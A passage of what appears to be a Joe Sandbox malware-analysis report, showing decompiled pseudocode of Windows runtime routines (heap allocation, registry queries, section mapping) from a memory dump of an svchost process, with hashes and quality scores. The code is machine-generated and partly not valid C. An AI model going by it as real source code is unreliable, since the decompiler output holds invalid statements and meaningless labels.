                        								 *(_t237 - 0x40) = _t236;
                        								 *(_t237 - 0x50) = _t236;
                        								while(1) {
                        									_t163 =  *(_t235 + 8);
                        									__eflags = _t224 - _t163;
                        									if(_t224 >= _t163) {
                        										break;
                        									}
                        									_t228 =  *0x3117b9c; // 0x0
                        									_t214 = L03044620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                        									 *(_t237 - 0x78) = _t214;
                        									__eflags = _t214;
                        									if(_t214 == 0) {
                        										L52:
                        										_t193 = 0xc0000017;
                        										L19:
                        										 *(_t237 - 0x44) = _t193;
                        										L20:
                        										_t206 =  *(_t237 - 0x40);
                        										__eflags = _t206;
                        										if(_t206 == 0) {
                        											L26:
                        											__eflags = _t193;
                        											if(_t193 < 0) {
                        												E030637F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                        												__eflags =  *((char*)(_t237 - 0x39));
                        												if( *((char*)(_t237 - 0x39)) != 0) {
                        													 *0x3117b10 =  *0x3117b10 - 8;
                        												}
                        											} else {
                        												_t169 =  *(_t237 - 0x68);
                        												__eflags = _t169;
                        												if(_t169 != 0) {
                        													 *0x3117b04 =  *0x3117b04 - _t169;
                        												}
                        											}
                        											__eflags = _t193;
                        											if(_t193 >= 0) {
                        												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                        											}
                        											goto L30;
                        										}
                        										_t226 = _t206 * 0xc;
                        										__eflags = _t226;
                        										_t194 =  *(_t237 - 0x48);
                        										do {
                        											 *(_t237 - 0x40) = _t206 - 1;
                        											_t226 = _t226 - 0xc;
                        											 *(_t237 - 0x4c) = _t226;
                        											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                        											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                        												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                        												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                        													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                        													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                        													__eflags =  *((char*)(_t237 - 0x39));
                        													if( *((char*)(_t237 - 0x39)) == 0) {
                        														_t171 = _t210;
                        													} else {
                        														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                        														L030477F0(_t194, _t236, _t210 - 8);
                        														_t171 =  *(_t237 - 0x50);
                        													}
                        													L48:
                        													L030477F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                        													L46:
                        													_t206 =  *(_t237 - 0x40);
                        													_t226 =  *(_t237 - 0x4c);
                        													goto L24;
                        												}
                        												 *0x3117b08 =  *0x3117b08 + 1;
                        												goto L24;
                        											}
                        											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                        											__eflags = _t171;
                        											if(_t171 != 0) {
                        												__eflags =  *((char*)(_t237 - 0x39));
                        												if( *((char*)(_t237 - 0x39)) == 0) {
                        													goto L48;
                        												}
                        												E030657C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                        												goto L46;
                        											}
                        											L24:
                        											__eflags = _t206;
                        										} while (_t206 != 0);
                        										_t193 =  *(_t237 - 0x44);
                        										goto L26;
                        									}
                        									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                        									 *(_t237 - 0x7c) = _t232;
                        									 *(_t232 - 4) = _t214;
                        									 *(_t237 - 4) = _t236;
                        									E0306F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                        									_t238 = _t238 + 0xc;
                        									 *(_t237 - 4) = 0xfffffffe;
                        									_t215 =  *(_t237 - 0x48);
                        									__eflags = _t193;
                        									if(_t193 < 0) {
                        										L030477F0(_t215, _t236,  *(_t237 - 0x78));
                        										goto L20;
                        									}
                        									__eflags =  *((char*)(_t237 - 0x39));
                        									if( *((char*)(_t237 - 0x39)) != 0) {
                        										_t233 = E0305A44B( *(_t237 - 0x4c));
                        										 *(_t237 - 0x50) = _t233;
                        										__eflags = _t233;
                        										if(_t233 == 0) {
                        											L030477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                        											goto L52;
                        										}
                        										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                        										L17:
                        										_t234 =  *(_t237 - 0x40);
                        										_t218 = _t234 * 0xc;
                        										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                        										 *(_t218 + _t235 + 0x10) = _t236;
                        										_t224 = _t234 + 1;
                        										 *(_t237 - 0x40) = _t224;
                        										 *(_t237 - 0x50) = _t224;
                        										_t193 =  *(_t237 - 0x44);
                        										continue;
                        									}
                        									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                        									goto L17;
                        								}
                        								 *_t235 = _t236;
                        								_t165 = 0x10 + _t163 * 0xc;
                        								__eflags = _t165;
                        								_push(_t165);
                        								_push(_t235);
                        								_push(0x23);
                        								_push(0xffffffff);
                        								_t193 = E030696C0();
                        								goto L19;
                        							} else {
                        								goto L50;
                        							}
                        						}
                        						_t235 = _t237 - 0x38;
                        						 *(_t237 - 0x60) = _t235;
                        						goto L8;
                        					}
                        					goto L4;
                        				}
                        			}


                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2ab0810536f6bb7ce3b2f406320c58aedddf4b9dc3dd0f1edb48906a7d447c4f
                        • Instruction ID: 52f5903925dcfcea968d2379ac282e38b2c2bab8bc9be31ea6453b04f4d498d5
                        • Opcode Fuzzy Hash: 2ab0810536f6bb7ce3b2f406320c58aedddf4b9dc3dd0f1edb48906a7d447c4f
                        • Instruction Fuzzy Hash: D9B16DB4E02309DFCB15EFA8C984AEEFBB9BF89304F148569E405AB345D770A945CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E0305513A(intOrPtr __ecx, void* __edx) {
                        				signed int _v8;
                        				signed char _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				char _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				signed int _v40;
                        				intOrPtr _v44;
                        				intOrPtr _v48;
                        				char _v63;
                        				char _v64;
                        				signed int _v72;
                        				signed int _v76;
                        				signed int _v80;
                        				signed int _v84;
                        				signed int _v88;
                        				signed char* _v92;
                        				signed int _v100;
                        				signed int _v104;
                        				char _v105;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t157;
                        				signed int _t159;
                        				signed int _t160;
                        				unsigned int* _t161;
                        				intOrPtr _t165;
                        				signed int _t172;
                        				signed char* _t181;
                        				intOrPtr _t189;
                        				intOrPtr* _t200;
                        				signed int _t202;
                        				signed int _t203;
                        				char _t204;
                        				signed int _t207;
                        				signed int _t208;
                        				void* _t209;
                        				intOrPtr _t210;
                        				signed int _t212;
                        				signed int _t214;
                        				signed int _t221;
                        				signed int _t222;
                        				signed int _t226;
                        				intOrPtr* _t232;
                        				signed int _t233;
                        				signed int _t234;
                        				intOrPtr _t237;
                        				intOrPtr _t238;
                        				intOrPtr _t240;
                        				void* _t245;
                        				signed int _t246;
                        				signed int _t247;
                        				void* _t248;
                        				void* _t251;
                        				void* _t252;
                        				signed int _t253;
                        				signed int _t255;
                        				signed int _t256;
                        
                        				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                        				_v8 =  *0x311d360 ^ _t255;
                        				_v32 = _v32 & 0x00000000;
                        				_t251 = __edx;
                        				_t237 = __ecx;
                        				_t212 = 6;
                        				_t245 =  &_v84;
                        				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                        				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                        				_v48 = __ecx;
                        				_v36 = _t207;
                        				_t157 = memset(_t245, 0, _t212 << 2);
                        				_t256 = _t255 + 0xc;
                        				_t246 = _t245 + _t212;
                        				if(_t207 == 2) {
                        					_t247 =  *(_t237 + 0x60);
                        					_t208 =  *(_t237 + 0x64);
                        					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                        					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                        					_v104 = _t159;
                        					_v76 = _t159;
                        					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                        					_v100 = _t160;
                        					_v72 = _t160;
                        					L19:
                        					_v80 = _t208;
                        					_v84 = _t247;
                        					L8:
                        					_t214 = 0;
                        					if( *(_t237 + 0x74) > 0) {
                        						_t82 = _t237 + 0x84; // 0x124
                        						_t161 = _t82;
                        						_v92 = _t161;
                        						while( *_t161 >> 0x1f != 0) {
                        							_t200 = _v92;
                        							if( *_t200 == 0x80000000) {
                        								break;
                        							}
                        							_t214 = _t214 + 1;
                        							_t161 = _t200 + 0x10;
                        							_v92 = _t161;
                        							if(_t214 <  *(_t237 + 0x74)) {
                        								continue;
                        							}
                        							goto L9;
                        						}
                        						_v88 = _t214 << 4;
                        						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                        						_t165 = 0;
                        						asm("adc eax, [ecx+edx+0x7c]");
                        						_v24 = _t165;
                        						_v28 = _v40;
                        						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                        						_t221 = _v40;
                        						_v16 =  *_v92;
                        						_v32 =  &_v28;
                        						if( *(_t237 + 0x4e) >> 0xf == 0) {
                        							goto L9;
                        						}
                        						_t240 = _v48;
                        						if( *_v92 != 0x80000000) {
                        							goto L9;
                        						}
                        						 *((intOrPtr*)(_t221 + 8)) = 0;
                        						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                        						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                        						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                        						_t226 = 0;
                        						_t181 = _t251 + 0x66;
                        						_v88 = 0;
                        						_v92 = _t181;
                        						do {
                        							if( *((char*)(_t181 - 2)) == 0) {
                        								goto L31;
                        							}
                        							_t226 = _v88;
                        							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                        								_t181 = E0306D0F0(1, _t226 + 0x20, 0);
                        								_t226 = _v40;
                        								 *(_t226 + 8) = _t181;
                        								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                        								L34:
                        								if(_v44 == 0) {
                        									goto L9;
                        								}
                        								_t210 = _v44;
                        								_t127 = _t210 + 0x1c; // 0x1c
                        								_t249 = _t127;
                        								E03042280(_t181, _t127);
                        								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                        								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                        								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                        									L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                        								}
                        								_t189 = L03044620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                        								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                        								if(_t189 != 0) {
                        									 *((intOrPtr*)(_t189 + 8)) = _v20;
                        									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                        									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                        									 *_t232 = _t232 + 0x10;
                        									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                        									E0306F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                        									_t256 = _t256 + 0xc;
                        								}
                        								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                        								E0303FFB0(_t210, _t249, _t249);
                        								_t222 = _v76;
                        								_t172 = _v80;
                        								_t208 = _v84;
                        								_t247 = _v88;
                        								L10:
                        								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                        								_v44 = _t238;
                        								if(_t238 != 0) {
                        									 *0x311b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                        									_v44();
                        								}
                        								_pop(_t248);
                        								_pop(_t252);
                        								_pop(_t209);
                        								return E0306B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                        							}
                        							_t181 = _v92;
                        							L31:
                        							_t226 = _t226 + 1;
                        							_t181 =  &(_t181[0x18]);
                        							_v88 = _t226;
                        							_v92 = _t181;
                        						} while (_t226 < 4);
                        						goto L34;
                        					}
                        					L9:
                        					_t172 = _v104;
                        					_t222 = _v100;
                        					goto L10;
                        				}
                        				_t247 = _t246 | 0xffffffff;
                        				_t208 = _t247;
                        				_v84 = _t247;
                        				_v80 = _t208;
                        				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                        					_t233 = _v72;
                        					_v105 = _v64;
                        					_t202 = _v76;
                        				} else {
                        					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                        					_v105 = 1;
                        					if(_v63 <= _t204) {
                        						_v63 = _t204;
                        					}
                        					_t202 = _v76 |  *(_t251 + 0x40);
                        					_t233 = _v72 |  *(_t251 + 0x44);
                        					_t247 =  *(_t251 + 0x38);
                        					_t208 =  *(_t251 + 0x3c);
                        					_v76 = _t202;
                        					_v72 = _t233;
                        					_v84 = _t247;
                        					_v80 = _t208;
                        				}
                        				_v104 = _t202;
                        				_v100 = _t233;
                        				if( *((char*)(_t251 + 0xc4)) != 0) {
                        					_t237 = _v48;
                        					_v105 = 1;
                        					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                        						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                        						_t237 = _v48;
                        					}
                        					_t203 = _t202 |  *(_t251 + 0xb8);
                        					_t234 = _t233 |  *(_t251 + 0xbc);
                        					_t247 = _t247 &  *(_t251 + 0xb0);
                        					_t208 = _t208 &  *(_t251 + 0xb4);
                        					_v104 = _t203;
                        					_v76 = _t203;
                        					_v100 = _t234;
                        					_v72 = _t234;
                        					_v84 = _t247;
                        					_v80 = _t208;
                        				}
                        				if(_v105 == 0) {
                        					_v36 = _v36 & 0x00000000;
                        					_t208 = 0;
                        					_t247 = 0;
                        					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                        					goto L19;
                        				} else {
                        					_v36 = 1;
                        					goto L8;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: caffeb9c0dfa62e2cd1c30e73e233e9cf493d1d79ddb1acfdb5aba448c7b2107
                        • Instruction ID: 033560c63bed83963b37037a5d8408cee2d7d7c30948c34d4d27aec43b526940
                        • Opcode Fuzzy Hash: caffeb9c0dfa62e2cd1c30e73e233e9cf493d1d79ddb1acfdb5aba448c7b2107
                        • Instruction Fuzzy Hash: F9C1337550A3808FD754CF28C580A5AFBF1BF89314F188A6EF89A8B352D771E945CB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 74%
                        			E030503E2(signed int __ecx, signed int __edx) {
                        				signed int _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				intOrPtr _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				char _v52;
                        				char _v56;
                        				char _v64;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t56;
                        				signed int _t58;
                        				char* _t64;
                        				intOrPtr _t65;
                        				signed int _t74;
                        				signed int _t79;
                        				char* _t83;
                        				intOrPtr _t84;
                        				signed int _t93;
                        				signed int _t94;
                        				signed char* _t95;
                        				signed int _t99;
                        				signed int _t100;
                        				signed char* _t101;
                        				signed int _t105;
                        				signed int _t119;
                        				signed int _t120;
                        				void* _t122;
                        				signed int _t123;
                        				signed int _t127;
                        
                        				_v8 =  *0x311d360 ^ _t127;
                        				_t119 = __ecx;
                        				_t105 = __edx;
                        				_t118 = 0;
                        				_v20 = __edx;
                        				_t120 =  *(__ecx + 0x20);
                        				if(E03050548(__ecx, 0) != 0) {
                        					_t56 = 0xc000022d;
                        					L23:
                        					return E0306B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                        				} else {
                        					_v12 = _v12 | 0xffffffff;
                        					_t58 = _t120 + 0x24;
                        					_t109 =  *(_t120 + 0x18);
                        					_t118 = _t58;
                        					_v16 = _t58;
                        					E0303B02A( *(_t120 + 0x18), _t118, 0x14a5);
                        					_v52 = 0x18;
                        					_v48 = 0;
                        					0x840 = 0x40;
                        					if( *0x3117c1c != 0) {
                        					}
                        					_v40 = 0x840;
                        					_v44 = _t105;
                        					_v36 = 0;
                        					_v32 = 0;
                        					if(E03047D50() != 0) {
                        						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					} else {
                        						_t64 = 0x7ffe0384;
                        					}
                        					if( *_t64 != 0) {
                        						_t65 =  *[fs:0x30];
                        						__eflags =  *(_t65 + 0x240) & 0x00000004;
                        						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                        							_t100 = E03047D50();
                        							__eflags = _t100;
                        							if(_t100 == 0) {
                        								_t101 = 0x7ffe0385;
                        							} else {
                        								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        							}
                        							__eflags =  *_t101 & 0x00000020;
                        							if(( *_t101 & 0x00000020) != 0) {
                        								_t118 = _t118 | 0xffffffff;
                        								_t109 = 0x1485;
                        								E030A7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                        							}
                        						}
                        					}
                        					_t105 = 0;
                        					while(1) {
                        						_push(0x60);
                        						_push(5);
                        						_push( &_v64);
                        						_push( &_v52);
                        						_push(0x100021);
                        						_push( &_v12);
                        						_t122 = E03069830();
                        						if(_t122 >= 0) {
                        							break;
                        						}
                        						__eflags = _t122 - 0xc0000034;
                        						if(_t122 == 0xc0000034) {
                        							L38:
                        							_t120 = 0xc0000135;
                        							break;
                        						}
                        						__eflags = _t122 - 0xc000003a;
                        						if(_t122 == 0xc000003a) {
                        							goto L38;
                        						}
                        						__eflags = _t122 - 0xc0000022;
                        						if(_t122 != 0xc0000022) {
                        							break;
                        						}
                        						__eflags = _t105;
                        						if(__eflags != 0) {
                        							break;
                        						}
                        						_t109 = _t119;
                        						_t99 = E030A69A6(_t119, __eflags);
                        						__eflags = _t99;
                        						if(_t99 == 0) {
                        							break;
                        						}
                        						_t105 = _t105 + 1;
                        					}
                        					if( !_t120 >= 0) {
                        						L22:
                        						_t56 = _t120;
                        						goto L23;
                        					}
                        					if( *0x3117c04 != 0) {
                        						_t118 = _v12;
                        						_t120 = E030AA7AC(_t119, _t118, _t109);
                        						__eflags = _t120;
                        						if(_t120 >= 0) {
                        							goto L10;
                        						}
                        						__eflags =  *0x3117bd8;
                        						if( *0x3117bd8 != 0) {
                        							L20:
                        							if(_v12 != 0xffffffff) {
                        								_push(_v12);
                        								E030695D0();
                        							}
                        							goto L22;
                        						}
                        					}
                        					L10:
                        					_push(_v12);
                        					_t105 = _t119 + 0xc;
                        					_push(0x1000000);
                        					_push(0x10);
                        					_push(0);
                        					_push(0);
                        					_push(0xf);
                        					_push(_t105);
                        					_t120 = E030699A0();
                        					if(_t120 < 0) {
                        						__eflags = _t120 - 0xc000047e;
                        						if(_t120 == 0xc000047e) {
                        							L51:
                        							_t74 = E030A3540(_t120);
                        							_t119 = _v16;
                        							_t120 = _t74;
                        							L52:
                        							_t118 = 0x1485;
                        							E0302B1E1(_t120, 0x1485, 0, _t119);
                        							goto L20;
                        						}
                        						__eflags = _t120 - 0xc000047f;
                        						if(_t120 == 0xc000047f) {
                        							goto L51;
                        						}
                        						__eflags = _t120 - 0xc0000462;
                        						if(_t120 == 0xc0000462) {
                        							goto L51;
                        						}
                        						_t119 = _v16;
                        						__eflags = _t120 - 0xc0000017;
                        						if(_t120 != 0xc0000017) {
                        							__eflags = _t120 - 0xc000009a;
                        							if(_t120 != 0xc000009a) {
                        								__eflags = _t120 - 0xc000012d;
                        								if(_t120 != 0xc000012d) {
                        									_v28 = _t119;
                        									_push( &_v56);
                        									_push(1);
                        									_v24 = _t120;
                        									_push( &_v28);
                        									_push(1);
                        									_push(2);
                        									_push(0xc000007b);
                        									_t79 = E0306AAF0();
                        									__eflags = _t79;
                        									if(_t79 >= 0) {
                        										__eflags =  *0x3118474 - 3;
                        										if( *0x3118474 != 3) {
                        											 *0x31179dc =  *0x31179dc + 1;
                        										}
                        									}
                        								}
                        							}
                        						}
                        						goto L52;
                        					}
                        					if(E03047D50() != 0) {
                        						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					} else {
                        						_t83 = 0x7ffe0384;
                        					}
                        					if( *_t83 != 0) {
                        						_t84 =  *[fs:0x30];
                        						__eflags =  *(_t84 + 0x240) & 0x00000004;
                        						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                        							_t94 = E03047D50();
                        							__eflags = _t94;
                        							if(_t94 == 0) {
                        								_t95 = 0x7ffe0385;
                        							} else {
                        								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        							}
                        							__eflags =  *_t95 & 0x00000020;
                        							if(( *_t95 & 0x00000020) != 0) {
                        								E030A7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                        							}
                        						}
                        					}
                        					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                        						if( *0x3118708 != 0) {
                        							_t118 =  *0x7ffe0330;
                        							_t123 =  *0x3117b00; // 0x0
                        							asm("ror esi, cl");
                        							 *0x311b1e0(_v12, _v20, 0x20);
                        							_t93 =  *(_t123 ^  *0x7ffe0330)();
                        							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                        							asm("sbb esi, esi");
                        							_t120 =  ~_t50 & _t93;
                        						} else {
                        							_t120 = 0;
                        						}
                        					}
                        					if( !_t120 >= 0) {
                        						L19:
                        						_push( *_t105);
                        						E030695D0();
                        						 *_t105 =  *_t105 & 0x00000000;
                        						goto L20;
                        					}
                        					_t120 = E03037F65(_t119);
                        					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                        						__eflags = _t120;
                        						if(_t120 < 0) {
                        							goto L19;
                        						}
                        						 *(_t119 + 0x64) = _v12;
                        						goto L22;
                        					}
                        					goto L19;
                        				}
                        			}
                        0x03094df1
                        0x03094df8
                        0x03094dfe
                        0x03094e03
                        0x03094e05
                        0x03094e17
                        0x03094e07
                        0x03094e10
                        0x03094e10
                        0x03094e1c
                        0x03094e1f
                        0x03094e35
                        0x03094e35
                        0x03094e1f
                        0x03094df8
                        0x030504f1
                        0x030504fa
                        0x03094e3f
                        0x03094e47
                        0x03094e5b
                        0x03094e61
                        0x03094e67
                        0x03094e69
                        0x03094e71
                        0x03094e73
                        0x03050500
                        0x03050500
                        0x03050500
                        0x030504fa
                        0x03050508
                        0x0305051d
                        0x0305051d
                        0x0305051f
                        0x03050524
                        0x00000000
                        0x03050524
                        0x03050515
                        0x03050517
                        0x03094e7a
                        0x03094e7c
                        0x00000000
                        0x00000000
                        0x03094e85
                        0x00000000
                        0x03094e85
                        0x00000000
                        0x03050517

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e91d5585c87325317258cc0c04afed53a349fa03ad28538a8b3b78873e3c1ea5
                        • Instruction ID: 808e480fd63be7af61c28e5d3aa462ba266427a7d6862694686f79963fa2a8ef
                        • Opcode Fuzzy Hash: e91d5585c87325317258cc0c04afed53a349fa03ad28538a8b3b78873e3c1ea5
                        • Instruction Fuzzy Hash: 409125B5E03614AFEF21DA69C844BAFB7E4AB45724F0A0262FD10AB2D0D7749D41CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E0302C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                        				signed int _v8;
                        				char _v1036;
                        				signed int _v1040;
                        				char _v1048;
                        				signed int _v1052;
                        				signed char _v1056;
                        				void* _v1058;
                        				char _v1060;
                        				signed int _v1064;
                        				void* _v1068;
                        				intOrPtr _v1072;
                        				void* _v1084;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t70;
                        				intOrPtr _t72;
                        				signed int _t74;
                        				intOrPtr _t77;
                        				signed int _t78;
                        				signed int _t81;
                        				void* _t101;
                        				signed int _t102;
                        				signed int _t107;
                        				signed int _t109;
                        				signed int _t110;
                        				signed char _t111;
                        				signed int _t112;
                        				signed int _t113;
                        				signed int _t114;
                        				intOrPtr _t116;
                        				void* _t117;
                        				char _t118;
                        				void* _t120;
                        				char _t121;
                        				signed int _t122;
                        				signed int _t123;
                        				signed int _t125;
                        
                        				_t125 = (_t123 & 0xfffffff8) - 0x424;
                        				_v8 =  *0x311d360 ^ _t125;
                        				_t116 = _a4;
                        				_v1056 = _a16;
                        				_v1040 = _a24;
                        				if(E03036D30( &_v1048, _a8) < 0) {
                        					L4:
                        					_pop(_t117);
                        					_pop(_t120);
                        					_pop(_t101);
                        					return E0306B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                        				}
                        				_t70 = _a20;
                        				if(_t70 >= 0x3f4) {
                        					_t121 = _t70 + 0xc;
                        					L19:
                        					_t107 =  *( *[fs:0x30] + 0x18);
                        					__eflags = _t107;
                        					if(_t107 == 0) {
                        						L60:
                        						_t68 = 0xc0000017;
                        						goto L4;
                        					}
                        					_t72 =  *0x3117b9c; // 0x0
                        					_t74 = L03044620(_t107, _t107, _t72 + 0x180000, _t121);
                        					_v1064 = _t74;
                        					__eflags = _t74;
                        					if(_t74 == 0) {
                        						goto L60;
                        					}
                        					_t102 = _t74;
                        					_push( &_v1060);
                        					_push(_t121);
                        					_push(_t74);
                        					_push(2);
                        					_push( &_v1048);
                        					_push(_t116);
                        					_t122 = E03069650();
                        					__eflags = _t122;
                        					if(_t122 >= 0) {
                        						L7:
                        						_t114 = _a12;
                        						__eflags = _t114;
                        						if(_t114 != 0) {
                        							_t77 = _a20;
                        							L26:
                        							_t109 =  *(_t102 + 4);
                        							__eflags = _t109 - 3;
                        							if(_t109 == 3) {
                        								L55:
                        								__eflags = _t114 - _t109;
                        								if(_t114 != _t109) {
                        									L59:
                        									_t122 = 0xc0000024;
                        									L15:
                        									_t78 = _v1052;
                        									__eflags = _t78;
                        									if(_t78 != 0) {
                        										L030477F0( *( *[fs:0x30] + 0x18), 0, _t78);
                        									}
                        									_t68 = _t122;
                        									goto L4;
                        								}
                        								_t110 = _v1056;
                        								_t118 =  *((intOrPtr*)(_t102 + 8));
                        								_v1060 = _t118;
                        								__eflags = _t110;
                        								if(_t110 == 0) {
                        									L10:
                        									_t122 = 0x80000005;
                        									L11:
                        									_t81 = _v1040;
                        									__eflags = _t81;
                        									if(_t81 == 0) {
                        										goto L15;
                        									}
                        									__eflags = _t122;
                        									if(_t122 >= 0) {
                        										L14:
                        										 *_t81 = _t118;
                        										goto L15;
                        									}
                        									__eflags = _t122 - 0x80000005;
                        									if(_t122 != 0x80000005) {
                        										goto L15;
                        									}
                        									goto L14;
                        								}
                        								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                        								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                        									goto L10;
                        								}
                        								_push( *((intOrPtr*)(_t102 + 8)));
                        								_t59 = _t102 + 0xc; // 0xc
                        								_push(_t110);
                        								L54:
                        								E0306F3E0();
                        								_t125 = _t125 + 0xc;
                        								goto L11;
                        							}
                        							__eflags = _t109 - 7;
                        							if(_t109 == 7) {
                        								goto L55;
                        							}
                        							_t118 = 4;
                        							__eflags = _t109 - _t118;
                        							if(_t109 != _t118) {
                        								__eflags = _t109 - 0xb;
                        								if(_t109 != 0xb) {
                        									__eflags = _t109 - 1;
                        									if(_t109 == 1) {
                        										__eflags = _t114 - _t118;
                        										if(_t114 != _t118) {
                        											_t118 =  *((intOrPtr*)(_t102 + 8));
                        											_v1060 = _t118;
                        											__eflags = _t118 - _t77;
                        											if(_t118 > _t77) {
                        												goto L10;
                        											}
                        											_push(_t118);
                        											_t56 = _t102 + 0xc; // 0xc
                        											_push(_v1056);
                        											goto L54;
                        										}
                        										__eflags = _t77 - _t118;
                        										if(_t77 != _t118) {
                        											L34:
                        											_t122 = 0xc0000004;
                        											goto L15;
                        										}
                        										_t111 = _v1056;
                        										__eflags = _t111 & 0x00000003;
